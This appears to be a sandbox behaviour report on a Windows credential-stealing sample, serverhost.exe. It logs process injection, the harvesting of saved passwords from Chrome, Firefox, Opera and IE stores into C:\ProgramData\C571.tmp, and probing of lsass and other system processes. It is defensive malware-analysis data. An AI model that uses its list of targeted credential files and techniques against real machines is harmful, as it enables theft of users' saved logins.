Get Address | c:\windows\system32\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x772b2251 | True | 1
Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x772b28f6 | True | 1
Get Address | c:\windows\system32\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x765c2004 | True | 1
Get Address | c:\windows\system32\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x76619aa9 | True | 1
Get Address | c:\windows\system32\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x0 | False | 1
Get Address | c:\windows\system32\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7661f3cf | True | 1
Get Address | c:\windows\system32\kernel32.dll | function = CompareStringEx, address_out = 0x765eebc6 | True | 1
Get Address | c:\windows\system32\kernel32.dll | function = GetDateFormatEx, address_out = 0x7662f29f | True | 1
Get Address | c:\windows\system32\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x765c53a5 | True | 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetTimeFormatEx, address_out = 0x7662f21a True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x7661f70b True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsValidLocaleName, address_out = 0x7661f71b True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = LCMapStringEx, address_out = 0x7661f72b True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetTickCount64, address_out = 0x765ceb4e True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
System (3)
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2017-10-12 10:39:22 (UTC) True 1
Fn
Get Time type = Ticks, time = 119293 True 2
Fn
Environment (1)
Operation Additional Information Success Count Logfile
Get Environment String True 1
Fn
Data
Process #14: serverhost.exe
(Host: 1026, Network: 0)
Information Value
ID #14
File Name c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe
Command Line "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C571.tmp"
Initial Working Directory C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor Start Time: 00:01:25, Reason: Child Process
Unmonitor End Time: 00:02:25, Reason: Terminated by Timeout
Monitor Duration 00:01:00
OS Process Information
Information Value
PID 0xc64
Parent PID 0xc18 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username F71GWAT\BGC6u8Oy yXGxkR
Groups
  • F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xc68
0xc80
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False
locale.nls 0x00040000 0x000a6fff Memory Mapped File Readable False False False
pagefile_0x00000000000b0000 0x000b0000 0x00177fff Pagefile Backed Memory Readable True False False
private_0x0000000000180000 0x00180000 0x00180fff Private Memory Readable, Writable True False False
private_0x0000000000190000 0x00190000 0x0028ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000290000 0x00290000 0x00390fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000003a0000 0x003a0000 0x003a0fff Pagefile Backed Memory Readable, Writable True False False
tzres.dll 0x003b0000 0x003b0fff Memory Mapped File Readable False False False
private_0x00000000003b0000 0x003b0000 0x003bffff Private Memory Readable, Writable True False False
pagefile_0x00000000003b0000 0x003b0000 0x003b7fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000003c0000 0x003c0000 0x003c6fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000003d0000 0x003d0000 0x003d1fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000003e0000 0x003e0000 0x003effff Private Memory Readable, Writable True False False
pagefile_0x00000000003f0000 0x003f0000 0x003f7fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000400000 0x00400000 0x0045afff Private Memory Readable, Writable, Executable True False False
rsaenh.dll 0x00460000 0x0049bfff Memory Mapped File Readable False False False
private_0x0000000000520000 0x00520000 0x0052ffff Private Memory Readable, Writable True False False
private_0x0000000000570000 0x00570000 0x0066ffff Private Memory Readable, Writable True False False
private_0x0000000000670000 0x00670000 0x0076ffff Private Memory Readable, Writable True False False
sortdefault.nls 0x00770000 0x00a3efff Memory Mapped File Readable False False False
private_0x0000000000a60000 0x00a60000 0x00b5ffff Private Memory Readable, Writable True False False
private_0x0000000000b60000 0x00b60000 0x00c3ffff Private Memory Readable, Writable True False False
serverhost.exemh.exe 0x00c40000 0x00c5afff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x0000000000c60000 0x00c60000 0x0185ffff Pagefile Backed Memory Readable True False False
private_0x0000000001860000 0x01860000 0x01960fff Private Memory Readable, Writable True False False
nss3.dll 0x01860000 0x01a11fff Memory Mapped File Readable False False False
nss3.dll 0x01860000 0x01a11fff Memory Mapped File Readable False False False
private_0x0000000001860000 0x01860000 0x0197ffff Private Memory Readable, Writable True False False
private_0x0000000001860000 0x01860000 0x0195ffff Private Memory Readable, Writable True False False
private_0x0000000001970000 0x01970000 0x0197ffff Private Memory Readable, Writable True False False
private_0x0000000001980000 0x01980000 0x01a7ffff Private Memory Readable, Writable True False False
private_0x0000000001a00000 0x01a00000 0x01afffff Private Memory Readable, Writable True False False
pagefile_0x0000000001b00000 0x01b00000 0x01ef2fff Pagefile Backed Memory Readable True False False
nss3.dll 0x63270000 0x63424fff Memory Mapped File Readable, Writable, Executable False False False
msvcr100.dll 0x6d490000 0x6d54dfff Memory Mapped File Readable, Writable, Executable False False False
winmm.dll 0x6e620000 0x6e651fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x6eb50000 0x6ebd3fff Memory Mapped File Readable, Writable, Executable False False False
msvcp100.dll 0x6f270000 0x6f2d8fff Memory Mapped File Readable, Writable, Executable False False False
mozglue.dll 0x6f2e0000 0x6f301fff Memory Mapped File Readable, Writable, Executable False False False
wsock32.dll 0x6f310000 0x6f316fff Memory Mapped File Readable, Writable, Executable False False False
freebl3.dll 0x6f3d0000 0x6f41efff Memory Mapped File Readable, Writable, Executable False False False
freebl3.dll 0x6f3e0000 0x6f42efff Memory Mapped File Readable, Writable, Executable False False False
softokn3.dll 0x6f420000 0x6f446fff Memory Mapped File Readable, Writable, Executable False False False
nssdbm3.dll 0x6f430000 0x6f446fff Memory Mapped File Readable, Writable, Executable False False False
softokn3.dll 0x6f450000 0x6f476fff Memory Mapped File Readable, Writable, Executable False False False
nssdbm3.dll 0x6f460000 0x6f476fff Memory Mapped File Readable, Writable, Executable False False False
vaultcli.dll 0x6f4d0000 0x6f4dbfff Memory Mapped File Readable, Writable, Executable False False False
pstorec.dll 0x71ec0000 0x71eccfff Memory Mapped File Readable, Writable, Executable False False False
atl.dll 0x741c0000 0x741d3fff Memory Mapped File Readable, Writable, Executable False False False
version.dll 0x74940000 0x74948fff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x74c20000 0x74c5afff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x74e70000 0x74e85fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x75340000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x75460000 0x7546bfff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75470000 0x754b9fff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x755b0000 0x756ccfff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x756f0000 0x75708fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x75710000 0x757b0fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x757c0000 0x7588bfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x764f0000 0x7658ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76590000 0x76663fff Memory Mapped File Readable, Writable, Executable False False False
comdlg32.dll 0x76670000 0x766eafff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x76780000 0x7682bfff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x76840000 0x7688dfff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x76890000 0x76958fff Memory Mapped File Readable, Writable, Executable False False False
ws2_32.dll 0x76960000 0x76994fff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x76b40000 0x76b96fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76ba0000 0x76c2efff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x76c60000 0x76e5afff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76e60000 0x76efcfff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76f00000 0x77035fff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x77040000 0x77134fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x77140000 0x7729bfff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x772a0000 0x773dbfff Memory Mapped File Readable, Writable, Executable False False False
nsi.dll 0x773e0000 0x773e5fff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x773f0000 0x773f4fff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x77400000 0x7741efff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x774e0000 0x774e0fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory Readable True False False
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False
private_0x000000007ffd4000 0x7ffd4000 0x7ffd4fff Private Memory Readable, Writable True False False
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory Readable, Writable True False False
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory Readable, Writable True False False
Injection Information
Injection Type Source Process Source Os Thread ID Injection Info Success Count Logfile
Modify Memory #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe 0xc24 address = 0x400000, size = 372736 True 1
Fn
Data
Modify Memory #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe 0xc24 address = 0x7ffd4008, size = 4 True 1
Fn
Data
Modify Control Flow #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe 0xc24 os_tid = 0xc68, address = 0x0 True 1
Fn
Host Behavior
File (795)
Operation Filename Additional Information Success Count Logfile
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\places.sqlite desired_access = GENERIC_READ, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data desired_access = GENERIC_READ True 1
Fn
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data desired_access = GENERIC_READ True 1
Fn
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\ProgramData\C571.tmp desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost_lng.ini type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat type = size True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat type = size True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat type = size True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat type = size True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\WebCache\WebCacheV24.dat type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\history.dat type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\places.sqlite type = file_attributes True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\places.sqlite type = time True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\profiles.ini type = file_attributes True 1
Fn
Get Info C:\Program Files\Mozilla Firefox\nss3.dll type = file_attributes True 3
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\logins.json type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\signons.sqlite type = file_attributes True 1
Fn
Get Info C:\Program Files\Mozilla Firefox\sqlite3.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\Mozilla Firefox\mozsqlite3.dll type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini type = file_attributes False 1
Fn
Get Info C:\Program Files\Sea Monkey\nss3.dll type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Crashpad\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Crashpad\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data type = file_attributes True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal type = file_attributes True 2
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data type = size, size_out = 0 True 5
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data-wal type = file_attributes False 2
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data type = file_attributes True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal type = file_attributes True 2
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data type = size, size_out = 0 True 5
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data-wal type = file_attributes False 2
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\EVWhitelist\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\EVWhitelist\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\OriginTrials\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\OriginTrials\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\PepperFlash\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\PepperFlash\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\pnacl\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\pnacl\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SwiftShader\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SwiftShader\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SwReporter\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SwReporter\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\WidevineCdm\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\WidevineCdm\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Apple Computer\Preferences\keychain.plist type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Opera\Opera\wand.dat type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Opera\Opera7\profile\wand.dat type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Opera Software\Opera Stable\Login Data type = file_attributes False 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat size = 32, size_out = 32 True 1
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat size = 8, size_out = 8 True 124
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat size = 256, size_out = 256 True 114
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat size = 384, size_out = 384 True 10
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat size = 32, size_out = 32 True 1
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat size = 8, size_out = 8 True 124
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat size = 256, size_out = 256 True 114
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat size = 384, size_out = 384 True 10
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat size = 32, size_out = 32 True 1
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat size = 8, size_out = 8 True 80
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat size = 256, size_out = 256 True 12
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat size = 384, size_out = 384 True 2
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat size = 32, size_out = 32 True 1
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat size = 8, size_out = 8 True 92
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat size = 256, size_out = 256 True 4
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data size = 100, size_out = 100 True 1
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data size = 2048, size_out = 2048 True 4
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data size = 16, size_out = 16 True 1
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data size = 100, size_out = 100 True 1
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data size = 2048, size_out = 2048 True 2
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data size = 16, size_out = 16 True 1
Fn
Data
Write C:\ProgramData\C571.tmp size = 3 True 1
Fn
Data
Write C:\ProgramData\C571.tmp size = 1 True 8
Fn
Data
Write C:\ProgramData\C571.tmp size = 11 True 1
Fn
Data
Write C:\ProgramData\C571.tmp size = 9 True 1
Fn
Data
Write C:\ProgramData\C571.tmp size = 8 True 1
Fn
Data
Write C:\ProgramData\C571.tmp size = 17 True 1
Fn
Data
Write C:\ProgramData\C571.tmp size = 15 True 1
Fn
Data
Write C:\ProgramData\C571.tmp size = 14 True 1
Fn
Data
Write C:\ProgramData\C571.tmp size = 12 True 1
Fn
Data
Write C:\ProgramData\C571.tmp size = 13 True 1
Fn
Data
Write C:\ProgramData\C571.tmp size = 2 True 1
Fn
Data
Registry (29)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\bin False 3
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin value_name = PathToExe, data = C:\Program Files\Mozilla Firefox\firefox.exe, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin value_name = PathToExe, data = C:\Program Files\Mozilla Firefox\firefox.exe, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin value_name = PathToExe, data = C:\Program Files\Mozilla Firefox\firefox.exe, type = REG_SZ True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla False 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla False 1
Fn
Process (54)
Operation Process Additional Information Success Count Logfile
Open System desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\smss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\wininit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\winlogon.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\services.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsass.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
